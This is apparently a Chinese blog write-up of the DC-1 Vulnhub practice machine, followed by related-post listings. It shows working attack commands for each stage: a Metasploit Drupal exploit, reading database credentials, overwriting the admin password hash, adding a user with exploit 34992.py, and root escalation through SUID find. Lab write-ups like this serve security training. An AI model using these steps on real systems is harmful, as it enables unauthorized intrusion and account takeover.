DC-1靶机攻略

已于 2023-08-04 20:50:05 修改
阅读量108 收藏 1
点赞数
分类专栏: 网络安全基础 文章标签: 数据库 网络安全 linux
于 2023-08-04 20:31:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46107438/article/details/132111637
版权

DC-1

文章目录

1.扫描

· 扫描端口

nmap -A 192.168.88.130 -p-

在这里插入图片描述

· 扫描目录

dirb 192.168.88.130
#未扫出有用目录

· 扫描漏洞

msfconsole
search drupal
use 1

在这里插入图片描述

2.利用漏洞

在这里插入图片描述

可以使用反弹shell

shell
python -c "import pty;pty.spawn('/bin/bash')"

3.翻文件

在这里插入图片描述

  • flag4

在这里插入图片描述

在数据库添加用户
find . -name "set*"

在这里插入图片描述

在这里插入图片描述

drupaldb
dbuser:R0ck3t
翻数据库
mysql -udbuser -pR0ck3t
show database;
use drupaldb;
show tables;
select * from users\G;#加\G将查到的结构旋转90度

admin:$S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
Fred:$S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg
  • hash加密,寻找加密文件
find . -name "*hash*"

在这里插入图片描述

123456:$S$DCfm4ArOmrzZa6jSdVvOCJnex9vF4L32nsccVFZVpSTWPMBIcf7w
  • 修改数据库admin密码
update users set pass='$S$DCfm4ArOmrzZa6jSdVvOCJnex9vF4L32nsccVFZVpSTWPMBIcf7w'where name="admin";
直接调用漏洞添加用户

也可直接通过以下漏洞添加用户

searchsploit drupal
searchsploit  -m 34992.py
python2 34992.py -t http://192.168.88.134 -u 123456 -p 123456

添加一个用户名123456密码123456的用户来登录(存在admin用户,无法添加)
在这里插入图片描述

登录进网页

请添加图片描述

4.提权

查看所用文件

find / -perm -u=s -type f 2>/dev/null

请添加图片描述

  • find提权
find / -exec "/bin/bash" -p \;

在这里插入图片描述

Change State
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机DC-1攻略
weixin_43179779的博客
10-07 1122
dc-1靶机靶机攻略
网络安全最全DC系列靶机1通关教程_dc1 靶机,2024年来看看网络安全的发展
最新发布
2401_84253089的博客
05-14 965
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
DC-1靶机,初级渗透详细教程
2302_79546589的博客
11-24 1274
根据之前的提示看一下配置文件,一般来说配置文件都有一些特别重要的信息在里面,搞不好还能提权,百度Drupal配置文件,路径是Sites/default/settings.php,我们可以用命令直接搜索并打开,内联执行。这个脚本是用php写的,而且还能用php加参数运行,直接得到加密后的密码,这里我们设置一个密码123。密码加密了,像登录就不太好登陆了,我们可以修改一下admin的密码。看到漏洞还是挺多的,我们用等级比较高,也比较新的18年的漏洞。find比较常用,可以执行root权限的命令找查文件,
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-14 7724
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
渗透入门:DC-1主机渗透详细教学
2301_77472496的博客
09-19 1023
DC系列靶场是一组专门为渗透测试而设计的易受攻击的实验室,共有九个靶场。它的目的是让初学者获得渗透测试领域的经验,但是它的难度取决于你的技能和知识,以及你的学习能力。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
复现DC-1靶机.pdf
03-22
复现DC-1靶机.pdf
dc-4靶机练习.docx
01-02
靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
DC1-靶机详解
TonyChaoWei的博客
02-06 1743
DC系列靶机渗透实战 提权
2021-8-4dc1靶机实战记录
qq_45290991的博客
08-06 215
一、打点,nmap发现22,80,都开着,80发现drupal,必应搜索drupal exploit ,在GitHub上,getshell参考我之前的博客,rce,代码审计看不懂,白宫的cms果然很难。。。 HackNos-Os-hackNos-1靶机-drupal-getshell 找到flag之后就不知道怎么做了,这里发现一个有趣的命令可执行漏洞: shell.php原本就存在这里,我也不知道作者什么意思? 但是权限在1000开外,看不了,我看了flag1.txt,但是我不知道这个.
Hashcat
波波日常工作学习的笔记本
02-01 816
Hashcat 自称是世界上最快的密码恢复工具。它在2015年之前拥有专有代码库,但现在作为免费软件发布。适用于 Linux,OS X 和 Windows 的版本可以使用基于 CPU 或基于 GPU 的变体。支持 hashcat 的散列算法有 Microsoft LM hash,MD4,MD5,SHA 系列,Unix 加密格式,MySQL 和 Cisco PIX 等。
DC-1靶机初学习
qq_58672257的博客
12-12 377
/scripts/password-hash.sh 123456(查看123456的hash)default.settings.php files settings.php(配置文件)cat /user/share/john/password.lst(kali字典存放路径)(\G将查找到的变成纵向)信息收集---漏洞探测---验证---爆破---提权---登录。返回www-data@DC-1:/var/www$漏洞,cms版本,----信息。use 0-7(任意一个)发现users(高危表名)
DC-1黑盒测试
A182184的博客
12-19 210
一名不知名小白黑盒测试DC-1靶场的一些思路,希望大家交流经验共同学习
Vulhub-DC-1靶场通关攻略
weixin_51339377的博客
03-16 3553
靶场环境配置: 修改为usb1.0同时新建网络,把网络修改为NAT即可 首先开启靶机环境和kali黑客机器环境 通过NAT模式可以保证两者处于同一个内网环境中 切记 vmware和virtualbox的虚拟网卡可能网段不同 所以要保证kali和靶机在同一个网段 否则无法扫描到相应的靶机 1.第一步 通过kali中自带的一个工具 arp-scan进行内网存活主机探测 arp-scan -l 2.接下来可以借助nmap对目标进行扫描 其中 -sV服务指纹识别 可以探测目标系统...
DC-7靶机攻略
真正的大师,永远都怀着一颗学徒的心。
08-07 820
前言 其他DC靶机攻略请查看我的其他文章。 一、DC-7的信息收集 DC-7靶机开启后,可以直接看到IP地址,我们直接nmap扫描查看一下目标开放的端口: 扫描后我们可以查看到目标开放了80与22端口,并且网站的框架采用了Drupal8(后面会有用) 访问80端口,进入网站后需要登陆 在github上DC-7给出了一个用户名与密码 可是并不能登陆 <?php $servername = "localhost"; $username = "dc7user"; $password = .
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值